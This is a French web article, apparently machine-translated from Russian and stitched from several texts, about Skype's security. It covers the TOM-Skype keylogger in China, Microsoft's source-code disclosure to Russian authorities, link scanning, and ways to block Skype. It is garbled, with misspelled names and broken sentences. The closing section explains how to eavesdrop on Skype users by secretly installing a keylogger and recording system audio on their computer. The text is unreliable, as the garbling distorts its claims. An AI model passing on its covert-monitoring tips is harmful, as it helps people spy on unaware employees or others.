Quelques jours plus tôt, Bloomberg Businessweek, citant une étude de Jeffrey Knockel, étudiant américain de 27 ans, écrivait qu'en Chine Versions Skype(TOM-Skype), il existe une option pour suivre les actions des abonnés.

Comme Nokel l'a montré, la distribution chinoise de Skype inclut ce qu'on appelle « enregistreur de frappe"- un programme qui mémorise les séquences de lettres et de chiffres tapés sur le clavier. Ce programme, selon Nokel, les chèques composés Messages Skype pour la présence de mots « indésirables » et envoie les données collectées aux services de renseignement chinois.

Selon Knockel, TOM-Skype suit à la fois les liens vers des ressources contenant des références à la pornographie et à la drogue, ainsi que des mots spécifiques, tels que : Human Rights Watch, Reporters sans frontières, BBC News. En outre, les services de renseignement chinois attirent l'attention sur des conversations au cours desquelles sont évoqués des projets de manifestations.

Ajout.

Skype dément les informations parues dans les médias sur les écoutes téléphoniques des conversations par les services de renseignement russes.

«Pour garantir la sécurité des produits Microsoft (propriétaire de Skype) destinés à un usage gouvernemental, la société a conclu un accord pour utiliser le code source du produit. La divulgation des codes ne signifie pas l’accès aux produits utilisés par des particuliers et des entreprises, et ne permet pas aux organisations gouvernementales de lire des messages cryptés ou d’obtenir des données privées d’utilisateurs », a déclaré aux journalistes une agence de communication travaillant avec l’entreprise.

Un représentant de l’agence a souligné que « fournir le code source ne signifie pas divulguer les secrets d’une correspondance ou d’une fourniture privée ».

«Tous les algorithmes de cryptage utilisés par les agences gouvernementales dans divers pays sont largement connus - il s'agit des AES russes et américains, et d'autres. Connaissant l'algorithme de cryptage et ne possédant pas la clé, qui est créée du côté de l'utilisateur, le message de l'utilisateur ne peut pas être lu - c'est l'un des fondements de la cryptographie », a déclaré le représentant de l'agence.

Le commentaire officiel de Microsoft en Russie est que les informations transmises sur les codes sources du programme ont été divulguées parce qu'elles logiciel utilisé dans les organisations gouvernementales. "Microsoft a un accord sur le code source pour promouvoir la confiance dans Produits Microsoft(Programme de sécurité du gouvernement, GSP). Auparavant, la société avait exprimé sa volonté de divulguer le code source de Skype aux structures du FSB national. En soi, cela ne réduirait pas la force du cryptage. Cependant, d’autres explications semblaient étranges : « cela permettrait au FSB de développer des moyens de déchiffrer les informations ».

Dans le cadre de ce programme, les organismes autorisés ont accès à code source un nombre accru de produits destinés à être utilisés directement par les agences gouvernementales (ce qui nécessite le plus haut degré de sécurité et de fiabilité), ainsi que des moyens pour leur analyse », indique le commentaire.

"La divulgation GSP ne donne pas accès aux produits utilisés par les entreprises ou les particuliers, et ne permet pas aux agences gouvernementales de lire les communications cryptées ou d'obtenir les données privées des utilisateurs", a déclaré Skype.

En théorie, la connaissance des algorithmes de chiffrement n’offre pas de chances supplémentaires d’écouter une conversation. Bien que vous puissiez trouver des failles dans la mise en œuvre des mécanismes de sécurité et les contourner, par exemple, les interfaces utilisateur connectées sans succès. Enregistrez le son non pas à partir d'un programme en cours d'exécution, mais à partir d'un gestionnaire de son général système opérateur. Enfin, n'utilisez pas une recherche complète de clés, mais une recherche spécifiquement ciblée, conçue pour utiliser les « bugs » dans l'implémentation du code Skype, si les erreurs elles-mêmes, inconnues des développeurs, peuvent être trouvées. Et si les autorités ont suffisamment de compétences pour le faire.

Le commentaire de l’entreprise ne permet pas de savoir si la procédure de génération des clés de sécurité, qui, en théorie, devrait garantir la confidentialité des messages texte et vocaux, a changé récemment. Communication Skype. Auparavant, ces clés étaient générées sur les ordinateurs des utilisateurs, difficiles à contrôler.

Du réseau chaotique aux serveurs

Les experts notent que ces dernières années, la méthode d'envoi de données Skype a commencé à changer. "Après l'acquisition de Skype par Microsoft, l'architecture de ce produit a commencé à changer", explique Anton Razumov, responsable du groupe de conseil en sécurité chez Check Point Software Technologies.

"Auparavant, un modèle distribué était utilisé, lorsque le trafic passait directement d'un utilisateur à l'autre ; dans des cas extrêmes (par exemple, pour contourner les restrictions de traduction d'adresses dynamiques), des nœuds intermédiaires étaient utilisés (également utilisateurs de Skype, mais avec une connexion plus ouverte avec)."

"Maintenant, en effet, le rôle des serveurs est devenu plus important, ce qui facilite la résolution des tâches d'écoute du trafic", explique Razumov.

Andreï Sviridenko, président du conseil d'administration de Spirit DSP, qui fournit au marché des programmes de téléphonie IP, en parle également. "Auparavant, il y avait des "super-nœuds" - des ordinateurs d'utilisateurs que le système désignait automatiquement comme "mini-serveurs", en se basant, par exemple, sur le fait que ces ordinateurs disposaient d'un bon canal Internet ou d'un canal puissant. Cela se produisait automatiquement, et. ce réseau n'avait pas d'élément central et il était difficile à contrôler.

Surveiller le contenu des réseaux sociaux ne surprend pas les utilisateurs ; ils devront probablement s'habituer à l'anonymat limité de Skype. Selon Sviridenko, Microsoft utilise désormais des centres de données distincts qui prennent en charge le transfert des données Skype. « Microsoft a renforcé le composant serveur. Quand tout est sur les serveurs, c'est plus facile à contrôler, un « point de suppression » apparaît. Tout comme en téléphonie, il y a des nœuds. Le système SORM fonctionne de la même manière.« On sait que Skype a conclu il y a longtemps un accord avec les services de renseignement américains et leur a donné toutes les clés de cryptage. Ils n'étaient tout simplement pas incités à négocier avec nos services de renseignement. C'est pourquoi nos services de renseignement étaient agités et mécontents. Il s’est avéré que nos responsables parlaient sur Skype et que la CIA les écoutait, mais pas le FSB. C’était une situation anormale », ajoute Sviridenko.Cependant, les deux experts émettent une réserve sur le fait qu'ils ne disposent pas de données directes sur le fonctionnement de telles « écoutes téléphoniques » en Russie. Les données sont « en action ». Mais, par exemple, le nationaliste Dmitri Demushkin, leader du mouvement « Russes », n’a aucun doute sur son existence. "Dans l'affaire pénale contre moi, il y a des données provenant de conversations sur Skype et quatre volumes sont constitués uniquement de conversations sur Skype et VKontakte", a-t-il déclaré.

« Les données sur les conversations textuelles Skype dans cette affaire remontent à fin 2011. Dans mon cas, il n'y a pas de données sur Skype audio, mais les avocats qui travaillent sur d'autres affaires les ont également rencontrées. Oui, Skype est surveillé, juste. comme tout le monde est surveillé et surveillé», - dit Demushkin. Boris Nemtsov, un leader à l'opposé de l'opposition, n'a pas été surpris par les discussions sur la coopération entre Skype et les services de renseignement : « Mes conversations sont toujours mises sur écoute, donc je ne serais pas surpris si je découvrais que Skype est mis sur écoute. aussi."

"S'ils étaient d'accord avec le FSB, c'est un désastre", a déclaré Nemtsov. "Skype était un système plus sécurisé, mais désormais, évidemment, tous les efforts seront consacrés à l'écoute de Skype des opposants." "Je n'ai pas Skype, je suis un homme politique primitif", a déclaré le leader de "L'Autre Russie" Eduard Limonov. "Mais je me souviens très bien comment, en 2002, dans une prison de Saratov, ils m'ont permis d'écouter 35 cassettes. seulement du mien conversations téléphoniques, mais des enregistrements réalisés dans les locaux où j'ai vécu et travaillé. Je sais que tout est mis sur écoute, donc je suis, je suppose, plus ou moins prudent."

Un autre facteur était le message de H-Security selon lequel les liens transmis via Skype étaient rompus. Serveurs Microsoft. Rappelons que le fait de visiter uniquement les liens HTTPS a été confirmé expérimentalement - un peu plus tard après leur transmission via Skype. Cette observation a conduit à la conclusion que Microsoft utilise toutes les informations transmises, y compris les identifiants de session et d'utilisateur. Ce fait a été confirmé aujourd'hui par plusieurs experts indépendants. A noter que contrairement aux promesses de Microsoft, le HTTP classique ne sera jamais affecté.

L'une des hypothèses était que cette activité de la part de l'entreprise était causée par le nouveau produit SmartScreen Filter. Il existe cependant plusieurs incohérences, par exemple :

  • Pourquoi la vérification des liens s'effectue-t-elle avec un retard de plusieurs heures, et pas instantanément ? Le temps est toujours critique lorsqu’il s’agit de spam ou de phishing, et vérifier les liens « obsolètes » ne peut, au mieux, conduire qu’à les documenter.
  • Comment Microsoft va-t-il classer une page sans charger de contenu ? Il s'avère ensuite qu'une entreprise ne peut pas créer une base de données de notation en utilisant uniquement des requêtes HEAD.
  • Il est possible que cette demande vise à identifier les redirections potentielles vers des pages « maléfiques » déjà connues. Cependant, ces redirections peuvent être soit dans le code de la page (méta http-equiv="refresh"), soit intégrées via un iFrame standard, et la vérification HEAD à elle seule ne détectera pas ces menaces.

Notez que l'utilisation du filtre SmartScreen est entièrement documentée pour Internet Explorer et un algorithme pour sa désactivation est décrit. Mais pas pour Skype. En conséquence, il n’existe aucune information officielle selon laquelle cette technologie utilisé dans les chats Skype et, surtout, il n'y a aucune information sur la façon de le désactiver.

D’une manière ou d’une autre, la mise en œuvre actuelle par Microsoft de mécanismes de « sécurité » laisse beaucoup à désirer et présente un énorme potentiel négatif dans le domaine de la protection des données personnelles. À tout le moins, Microsoft devrait documenter cette fonctionnalité et donner à l'utilisateur la possibilité de la désactiver.

Laissez votre commentaire !

Depuis de nombreuses années, Skype a la réputation d'être le moyen de communication sur Internet le plus fiable et le plus protégé des regards et des oreilles indiscrets. En outre, les entreprises qui souhaitent empêcher leurs employés d’utiliser Skype sur leur lieu de travail rencontrent également des difficultés.

Skype est-il sécurisé ?

Ce n'est pas un hasard si Skype est considéré comme l'un des canaux de communication les mieux protégés contre les écoutes clandestines. Ses créateurs, qui avaient déjà de l'expérience dans l'organisation du réseau peer-to-peer Kazaa, ont créé un service de téléphonie IP qui fonctionne sur le principe d'un réseau P2P et utilise activement le cryptage du trafic à plusieurs niveaux. Malgré le grand intérêt pour Skype de la part des cybercriminels et des agences de renseignement, le protocole est maintenu de manière assez ferme et ne révèle pas ses secrets aux étrangers.

Malgré les rumeurs répétées d'attaques réussies et de portes dérobées, dans toute la longue histoire de Skype, il n'y a eu aucun rapport officiel indiquant que Skype a été piraté et écouté avec succès. Mais les forces de l'ordre peuvent rester tranquilles car la direction de Skype souligne qu'elle est prête à coopérer avec les forces de l'ordre. » dans la mesure du possible d'un point de vue juridique et technologique". Et les utilisateurs ordinaires ? Évidemment, s'ils ne font rien d'illégal et qu'ils sont plus préoccupés par la protection contre les intrus que contre les forces de l'ordre, alors ils n'ont pas à s'inquiéter non plus. Cryptage du trafic utilisant AES-256, pour le transfert la clé de leur file d'attente, 1024 bits sont utilisés Clé RSA, suffisant pour que les participants les plus exigeants aux négociations personnelles et professionnelles maintiennent la confidentialité des informations.

Pourquoi est-il difficile de bloquer Skype

Écouter Skype est bien plus difficile que de l'intercepter e-mail, que de nombreuses personnes utilisent sans recourir à aucun moyen de protection des données qui y sont transmises. Cependant, malgré la bonne sécurité du protocole, de nombreuses entreprises préfèrent bloquer l’accès des salariés à Skype.

Pourquoi cela est-il fait ? En règle générale, les employeurs eux-mêmes expliquent ce comportement très simplement : pour que l'employé ne soit pas distrait heures de travail, si la communication via Skype ne figure pas dans la liste de ses responsabilités immédiates. Les motivations suivantes sont également populaires : éviter d'éventuelles fuites d'informations confidentielles, économiser sur le trafic, que Skype consomme avec un très bon appétit... Même si ce dernier est déjà rare grâce à la pénétration généralisée des « unlims ».

Cependant, en raison d'un certain nombre de fonctionnalités du protocole Skype, même son blocage n'est pas si simple. Le fait est que pour contourner le blocage à l'aide de pare-feu, les développeurs Skype ont beaucoup travaillé au stade de la création. architecture distribuée votre protocole. Par conséquent, Skype est conçu de manière à pouvoir utiliser à la fois les protocoles UDP et TCP, et grâce au cryptage des paquets, il est également assez difficile de les reconnaître dans le trafic général. Bien entendu, on ne peut pas dire que cette tâche soit totalement insoluble.

Façons de résoudre le problème de blocage

AVEC en utilisant Google(ou Yandex, si c'est plus proche de vous moteur de recherche), vous pouvez trouver de nombreux forums où les administrateurs système tentent ensemble, avec plus ou moins de succès, de trouver une recette pour bloquer Skype à l'aide d'iptables. Il semble que les développeurs de Skype surveillent les tentatives des administrateurs et des fabricants de pare-feu pour bloquer leur produit, et les plus efficaces d'entre eux sont neutralisés en publiant une nouvelle version du client, qui contourne déjà avec succès les nouvelles méthodes de blocage du trafic Skype.

Cependant, il existe un certain nombre de produits tout à fait adaptés pour bloquer l'utilisation de Skype dans un bureau individuel. Les plus performantes sont les solutions « matérielles » - par exemple, Unified Security Gateway de Facetime ou Cisco IOS Flexible Packet Matching. Avec leur aide, vous pouvez soit bloquer complètement le trafic Skype, soit au moins freiner quelque peu l'appétit du client Skype en définissant une largeur fixe du canal qui lui est alloué. Quant aux « pare-feu » purement logiciels, selon les critiques, TeleMate NetSpective s'est révélé être un très bon parmi eux. La plupart des « pare-feu » largement utilisés (nous ne pointerons pas du doigt pour ne pas offenser leurs fabricants) ne sont hélas pas à la hauteur pour bloquer le trafic Skype.

Néanmoins, je le répète, la majorité des administrateurs qui, en pratique, ont été confrontés à la tâche d'interdire en utilisant Skype, conviennent que la mesure la plus efficace (et en même temps, peut-être la moins chère pour l'entreprise) est de supprimer le client Skype des postes de travail des utilisateurs et de surveiller en permanence qu'il ne puisse plus y apparaître. Mais cela, encore une fois, nécessite l'utilisation de solutions qui ne sont pas les moins chères pour surveiller les logiciels installés.

Revenons à la question de l'écoute.

Eh bien, après avoir parlé du blocage de Skype, revenons à une question beaucoup plus intéressante : l'écoute de ce protocole. Comme je l'ai dit plus haut, les capacités de cryptage sont largement suffisantes pour ne pas craindre que quelqu'un puisse profiter du trafic allant d'un client à un autre. Et pourtant, Skype peut être écouté et lu. Mais pas en interceptant et en déchiffrant le trafic envoyé par le client Skype, mais en interceptant ce flux de données qui n'a pas encore été chiffré et transmis. Bien entendu, cela nécessite d’avoir accès à l’ordinateur de la personne dont elle souhaite écouter les conversations Skype.

Ceci peut être mis en œuvre à l'aide de programmes qui interceptent toutes les informations provenant de carte son et des claviers (après tout, Skype a un chat, et vous voulez aussi le regarder), et des solutions spécialisées, « sur mesure » spécifiquement pour Skype. La première option peut être mise en œuvre avec peu d'effort - juste dans le même enregistreur de son standard, sélectionnez Stereo Mixer comme canal d'entrée (selon la carte son, il peut être appelé différemment - par exemple, "Ce que vous entendez"). Plus un enregistreur de frappe gratuit, que l'on peut trouver en cinq minutes en utilisant Google, et vous avez système prêt suivi des employés. Mais cela présente des inconvénients : parallèlement à la conversation Skype, la musique que l'utilisateur écoute entre les deux sera enregistrée. Il en va de même pour la saisie au clavier : vous devrez séparer manuellement le « bon grain de l'ivraie », c'est-à-dire les messages envoyés via Skype à partir de documents saisis dans Word. Quant aux outils spécialisés, Google a montré qu'ils étaient en réalité peu nombreux. One. SearchInform SkypeSniffer est à juste titre considéré comme le meilleur. Le programme peut isoler indépendamment les entrées vocales et clavier de Skype du flux général, et dispose également de puissantes capacités de recherche dans la base de données des messages utilisateur collectés. solution de protection contre les fuites de données. Vous pouvez mettre à jour si vous le souhaitez en l'utilisant.

CV

En général, nous pouvons dire que si vous n'êtes pas un terroriste international, vous n'avez pas à vous soucier d'intercepter vos conversations Skype - les gens ordinaires, même les plus avertis techniquement, ne sont toujours pas en mesure de le faire. Vous pouvez bloquer le trafic Skype si vous le souhaitez, mais il est beaucoup plus simple de bloquer l'installation du client Skype lui-même. Il n'est pas difficile d'écouter des conversations sur Skype en installant des intercepteurs sur l'ordinateur de l'utilisateur - si, bien sûr, un tel besoin existe.



2024 wisemotors.ru. Comment cela marche-t-il. Fer. Exploitation minière. Crypto-monnaie.